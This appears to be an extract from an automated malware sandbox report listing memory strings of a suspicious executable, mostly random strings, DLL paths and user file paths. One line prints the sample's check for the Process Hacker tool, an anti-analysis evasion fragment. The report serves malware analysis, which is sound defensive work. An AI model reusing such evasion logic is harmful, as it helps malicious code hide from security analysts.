                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m}tlm}t\m}tlm}t8m}t(m}tmemstr_841999d5-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l}tpl}tmemstr_82d9aa78-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gfv hzumemstr_f2b08dcc-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y\machin$memstr_5d83d83f-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{d3162b92-9365-467a-956b-92703aca08af}#memstr_2ae768b3-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ontdeskmemstr_1a503fb0-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ontdeskdmemstr_298d6930-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usermemstr_5cc2135d-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^c:\users\user\favorites\links\desktop.ini1memstr_3672340c-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1506416143.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tc:\users\user\desktop\uhbrqkynzx.exememstr_4aca3c72-d
                Source: uhbrQkYNzx.exe, 00000000.00000002.1506416143.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: richedit20wmemstr_7942cc6e-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswnmemstr_52334e7f-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswn memstr_b719d365-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rhjhuow,memstr_8e3610fc-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-localization-private-l1-1-0.dlldmemstr_bc395536-a
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\kernelbase.dllmemstr_4a95d37d-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: swg@@memstr_7b63d182-a
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rhjhuowmemstr_6be1b9bc-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-apiquery-l1-1-0.dllll@ memstr_f525f827-a
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ntdll.dll.dllmemstr_32f412bf-0
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-apiquery-l1-1-0.dll0.dllllmemstr_1ee17c28-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-apiquery-l1-1-0.dllmemstr_a5b7234f-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system3memstr_87d43f47-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0#'memstr_7f6c98d8-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswbmemstr_eab10460-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswb memstr_683b7ace-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dl*llmemstr_7db3902d-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tem32\kernel32.dlllmemstr_5f6a733b-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-processthreads-l1-1-0l memstr_f054a47c-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64'memstr_f5c26b13-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\wdmemstr_47715aff-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\kernelbase.dllmemstr_b309ff8d-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64memstr_5bf6dc06-d
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: owow@memstr_1ce38e4f-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [erwtmemstr_a8cab7a2-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: crwx&'memstr_ca5e925f-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qrwh$'memstr_c59e2f7a-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: -nrwtmemstr_3942d004-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: gvw`\rwmemstr_7c4b3f8d-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: yrwh$'memstr_6899ed65-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: (h$'memstr_d1926951-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ^{uwh$'memstr_d71d82da-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocsw'memstr_6f63f14c-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocsw' xmemstr_973711f9-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: i=9o'memstr_14b2e595-8
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 8o(#@omemstr_0c654af4-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: &*=omemstr_b4112dd5-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 7=o\3vwmemstr_ac658226-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: =o3u!memstr_d188f7e0-7
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: $4?o(4?o8memstr_9039a758-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d$4?o(4?o8memstr_5404c2bd-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: m=ogv!memstr_9e41a49f-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: snsw@memstr_2c4a0b36-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: |:o`m(memstr_404e2df8-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d{wwxmemstr_295b6d89-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: t=(o0\)omemstr_fd4c1480-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: t=(o0\)osnswmemstr_92d35d92-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qswammemstr_160c6a7d-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qswimmemstr_575d3420-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: snsw memstr_78a090db-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0a(oda(omemstr_fdd19bf1-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0a(oxmemstr_d70f1278-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: m(oxn(o|memstr_58bcd3a4-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rrsw;memstr_3b952c98-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d{ww memstr_d09b6071-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: <sw)4`xmemstr_f60675c5-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: osw@hmemstr_5e573096-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ^sw@@memstr_71aeb335-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: l4=oxmemstr_ce44eb23-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 3vwyg=o\memstr_55624830-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: :oxp(memstr_ac026e74-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 8o3c!memstr_e78b57d4-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: |,vw4memstr_e8a5c5d7-d
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: hsw "memstr_f5cf36b6-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qswq[memstr_ab5159f4-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: {wwd{wwmemstr_2961c5d6-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: #@ .memstr_0dd85cb9-0
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505349841.0000000002BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/a0e1i2m3q4u5y6]7a8e9i:m;q<u=y>}?memstr_44ab041a-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6joe0kznn0748xz2sq0w38478x8xmemstr_dd8c21cc-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s 7cmemstr_779872fd-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'm-gjmemstr_9e07c541-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xlzc5t4004266480r7kr1vky4p9uk32cmemstr_464f7544-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xscj866vev43g29xr2h06m05e3331uij9vn2gqmemstr_be156ffd-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 48g68p941rk22memstr_1483d9b4-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cpd50j9e529r3nu8p182j16av361i92p27batad5s87bx3memstr_afddc889-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4ukmjgmemstr_3efecbfd-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uj8j73b53jbn4x0t94n2m53l950cjxh62rynfu9zz71a9h5nmemstr_8a8c1e33-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 22tfg6nqj61y6d8qoo4memstr_42b85469-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 674p18vbinp3whnguw536ej59c90l838j5htvdm5memstr_33b4d904-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wl3tlx9db90umemstr_85adaab4-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w7prx6qe9p387g0543rpu371kmemstr_cb3da0aa-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 450nq55r7wfm5t218memstr_5b06abc3-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pkw86d25t5vt42zq8f2z4xpcr7ft4memstr_42521f91-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b9vs3mjnr3fw2898memstr_45fdb227-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9k0y27m8yukp6p5o9x2h5omemstr_0ce7ff7b-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 420o321w32pj35j8utipu4xmemstr_abe49290-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 93bs453199t6c399478pv2wfow8bubnpmemstr_3cac75b0-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process hacker") thenmemstr_efdc6c34-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \hgvememstr_c4db9fe1-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 69lp16y2hql0zy5q91038yj1s1y914u0s57v117sq220memstr_c5e89238-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 533ia6d1034zy51p18d4rjg80yf1692vbmemstr_0ae2bb97-c
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;m<?be-memstr_99f90f96-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =7py>memstr_b117e9bb-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1f8vi5xh84dix49j1qx5cdmemstr_9ed4a278-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: at2w70cd43rr1o169v88v8tibk6z6wep04xoso5w7bu869j4rmemstr_0d3f4f69-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4t8cjq1972zt7317y9t24h3j466g3c6c4lx9rom4zt0a228c8memstr_d7f6abac-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7gq05j4unp302023memstr_a08a7265-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y389ru8yw7c3yg9bchs8udrmemstr_7d859231-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rekzfmemstr_3a9c1475-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xr_cqmemstr_07d803f7-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y9501p9zmk715582atfuanmemstr_bdb4a250-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7rtvty8memstr_60984a1d-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ru?9-memstr_5a347bec-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ys41mmemstr_9840989b-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u1%q0<smemstr_4eefa093-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0p4y512ubd2s2xw0s8hxj4f8f4ixv0s1t4a742t99scva3memstr_2fb017c7-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 936cf7b794o4401qyz3b6kj0e22qmemstr_366af7a0-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hm9s0724gt9h0uea66rmemstr_59889221-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r79c06299p3s148z49xk4ict3491i1200memstr_effa2286-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4jc;]memstr_7a0fbf08-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 42417f6n7hgd5z725941memstr_76f2f387-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: veiqymemstr_ec7b3359-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-^yzq3memstr_3320440c-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2w85y29h2bzeaxkj58d7qm601memstr_544d93e2-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j0k2fzzwu553b6so570ekjnumemstr_d4e3a0a4-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7l6zu425nf4l3qu3v7p1l2n1pirq3e98c2dbk180wdh68nj7memstr_72e783e1-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q1j7gv94wy4t89memstr_084a9816-1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6891675yb9a62d5ghqlae1t0p23amemstr_fb5e19c2-7
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5332v234drmemstr_dd9abd78-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3ka4g698sa2mz7f8yqdadubah6g4w1x3p000r73z04memstr_4a0ebfd6-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zpyz0r6memstr_68093857-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4p?ymmemstr_46ce8474-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 89ayee0k343uaj01memstr_235c12e7-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p83u4ox9lzyo5tk0memstr_51f54328-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <_`62memstr_d274be81-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c hifmemstr_2b0dadb0-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 81j5i9l9o2epz9020kzommdwomemstr_0629a89e-8
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v08pp75fgdmemstr_f5825cb6-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bd49a22oe86i2lel218op1fmez9jj4194memstr_ead17b6a-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v18qn83hkfsok88l2v62v54236t1clh057xmemstr_2b209eaf-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 30bxghg77fag80wmemstr_775f5d09-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9c3x62181x9a6z8j0515cm6z9c64q0819961anq23dzw79memstr_e81883d5-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 59bn63q0t8t5h87ak3hp6a1xd599clrc7w9uwz8po1u39bg32pmemstr_4858c261-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h5224rimemstr_acf26939-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b15bm58bpfbx4cgy8nmemstr_ec8a208c-d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qb1034834memstr_ab794d7b-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a8cz0b33737a03vz4pm8bc6frmemstr_4a3fff03-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qi7gau1192vb42b7poux7ieop6w01k4o002661vlo6sjn159memstr_18ed31c9-0
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !_dnvmemstr_3a7e8695-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kon9d7jdwitoi0v850i7617713e6g0f2n0jnmb990vd3y1memstr_d203f600-f
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rh2jmnl34fc091tm4p633jm5hxo5287z821yut57q1tok45memstr_6e4c1484-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5rf6eg8lm49memstr_6a87c130-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9l0t36gciel6hs3cjg00lo49q17w9n2gd8p0pmemstr_fab4aae8-a
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nb6554654hx3z080c086lf96oq8c5953n6412hs46jwqn2985memstr_0596f4ca-9
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 12xt5y5l9yze2vnds8z48zmemstr_c3721473-6
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 733075tar9515n3j59rp6t598x0ofu0g75j8006735cbq1memstr_74465335-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lea;omemstr_5f32b3f5-7
